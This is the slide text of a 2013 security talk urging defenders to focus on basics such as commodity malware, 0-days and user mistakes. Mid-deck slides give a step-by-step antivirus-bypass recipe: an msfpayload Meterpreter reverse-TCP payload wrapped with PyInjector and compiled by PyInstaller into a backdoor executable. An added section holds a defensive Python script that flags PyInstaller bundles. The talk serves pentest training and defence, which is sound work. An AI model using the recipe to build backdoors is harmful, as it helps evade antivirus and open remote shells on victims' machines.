Security Weekly™ Presents: Give Me Three Things
Sometimes, three is bad
http://securityweekly.com
Brought To You By: consulting@blackhillsinfosec.com
The Need for Focus
• It is easy to get caught up in the latest “Hack of the day”
• Let’s talk about
  • iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013
#1 Crappy Malware
• Had enough presentations on the “Not so advanced persistent threat?”
• Somehow, the belief is if we can make fun of the attackers’ skill level it makes us….???
  • Better? Smarter?
• Why?
  • Because…..
Results Matter 
About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337 or even 31337
Just right
Poison Ivy 
Citadel 
AV Bypass Made Easy
• Many of these tools have options to export to a raw string of hex characters
• In fact, that does not even matter
• We can use Ghost Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies: Why I pentest
Ghost Writing: Creating the Binary
Converting to Assembly 
Editing the Assembly 
Finalize the Payload 
Python Injection
• Another technique is to:
  • Convert your payload into Raw output
  • Import the Raw output into a python script
  • Convert the Python script into an executable
• It works because the text sections of an .exe are not reviewed by many AV vendors
  • They would have to write the signature for Python itself
  • Not likely
• Great write up by Mark Baggett
  • http://tinyurl.com/SANS-580-Python-AV-Bypass
Windows AV Bypass - Setup
• Create a Windows box with prerequisites
  • Same as target (32-bit vs. 64-bit)
• Install Python: http://www.python.org/
  • Add Python to system PATH
• Install PyWin32: http://sourceforge.net/projects/pywin32/
• Install PyInstaller: http://www.pyinstaller.org/
• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip
Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any machine)
  • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
  • replace: shellcode = sys.argv[1]
  • with: shellcode = '<msfpayload output>'
  • where: <msfpayload output> = output from the above msfpayload command
Windows AV Bypass - Compile
• While in the PyInstaller Directory:
  • python utils\Makespec.py --onefile --noconsole pyinjector.py
  • python utils\Build.py pyinjector/pyinjector.spec
• New backdoor should be under:
  • [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
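The Python Injection and Compile slides above describe what the result looks like from the attacker's side: a PyInstaller-built executable whose Python payload no AV signature covers. The defender's counterpart is that the PyInstaller container itself is easy to recognise. The following is an added triage example written for this page; it is not code from the deck, from Black Hills, from TrustedSec's PyInjector or from the PyInstaller project. It relies on PyInstaller's documented archive magic (`MEI\014\013\012\013\016`) and assumes the 24-byte cookie layout of the PyInstaller 2.x CArchive (`!8siiii`: magic, package length, TOC offset, TOC length, Python version); newer PyInstaller releases append further fields after these. The function names `find_cookie`, `is_pyinstaller_bundle`, `scan_tree` and `make_sample` are chosen here, and the sample bytes are constructed, not taken from a real binary.

```python
"""Triage check: does a Windows executable carry a PyInstaller archive?

PyInstaller-built programs (onefile or onedir) carry a CArchive whose
cookie begins with the fixed 8-byte magic b"MEI\014\013\012\013\016".
The bundled Python code is opaque to signature-based AV, as the deck
notes, but the container format itself is easy to recognise, so an
unexpected PyInstaller bundle on an endpoint is worth a closer look.
"""
import os
import struct
import sys
from typing import Optional

PYINSTALLER_MAGIC = b"MEI\014\013\012\013\016"
# Assumed cookie layout (PyInstaller 2.x era CArchive): magic, package
# length, TOC offset, TOC length, Python version; big-endian 32-bit ints.
# Newer PyInstaller versions append further fields after these.
COOKIE_FORMAT = "!8siiii"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 24 bytes


def find_cookie(data: bytes) -> Optional[dict]:
    """Return the decoded cookie nearest the end of `data`, or None.

    The magic is searched from the end because the archive is appended
    to the bootloader; a magic with fewer than COOKIE_SIZE bytes after
    it is treated as a false hit rather than a bundle.
    """
    off = data.rfind(PYINSTALLER_MAGIC)
    if off < 0 or off + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers = struct.unpack_from(
        COOKIE_FORMAT, data, off
    )
    return {
        "offset": off,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": pyvers,  # raw field: 27 means Python 2.7 in this encoding
    }


def is_pyinstaller_bundle(data: bytes) -> bool:
    """True when `data` contains a complete PyInstaller cookie."""
    return find_cookie(data) is not None


def scan_tree(root: str, suffixes=(".exe",)) -> list:
    """Walk `root` and return the paths of executables that carry a cookie."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    blob = fh.read()
            except OSError:
                continue  # unreadable file: skip it, do not abort the sweep
            if is_pyinstaller_bundle(blob):
                hits.append(path)
    return hits


def make_sample(bundled: bool) -> bytes:
    """Constructed, inert stand-in for a binary (not a real PE or bundle)."""
    body = b"MZ" + b"\x00" * 128 + b"constructed sample, not a program" + b"\x00" * 32
    if not bundled:
        return body
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC, len(body), 96, 40, 27)
    return body + cookie


if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Usage: python pyinstaller_triage.py <directory to sweep>
        for hit in scan_tree(sys.argv[1]):
            print("PyInstaller bundle:", hit)
    else:
        for flag in (True, False):
            print("bundled" if flag else "plain", "->", find_cookie(make_sample(flag)))
```

This is a triage indicator, not a verdict: plenty of legitimate software ships as PyInstaller bundles, which is exactly why the deck's later lesson (focus on attacker actions and impact, not on the malware) still applies once a hit turns up.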
Or You Could Just Choose Option 15
#2 0-day du Jour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
• Why? Because it works
  • They do a lot with volume
• What is your patch success percentage?
Lessons
• Black-list AV is easy to bypass
  • In fact, we had to do it with Poison Ivy last week
  • Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as they need to be
  • Which is not very advanced
Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
• Get away from Black List Security
  • Now
  • Right now
  • .. I mean after this presentation
#3 Users Making “Mistakes”
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha Ha!!! Users are “dumb”
  • Yeah..
  • Right?
• Not so fast sparky
We are all Dumb
• Or, the pretexts for the attackers are getting really, really good
• Some SE pretexts we use are not fair
  • Major insurance company and a change of coverage
  • Linked-in merit badges
• If the attack is tailored, it is successful
Caller ID Spoofing 
Hail Pentest Geek!
http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/
Lessons
• Users are going to make mistakes
  • Not because they are dumb
  • Well, half of them are below average
  • Because they are not trained
  • And because the attackers are good
Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on attacker actions
• Limit the damage the user can do
  • Implement Firewalls
  • Implement Software Restriction Policies
  • Implement Internet Whitelisting
• But don’t simply believe the user is stupid
  • Train them: Securing the Human
Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We lose sight of that in this industry
OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013
End of Line
• Hack Naked TV Episodes
  • http://www.hacknaked.tv
• Watch us:
  • Blip.tv: http://blip.tv/securityweekly
  • YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
  • https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2

Give Me Three Things: Anti-Virus Bypass Made Easy
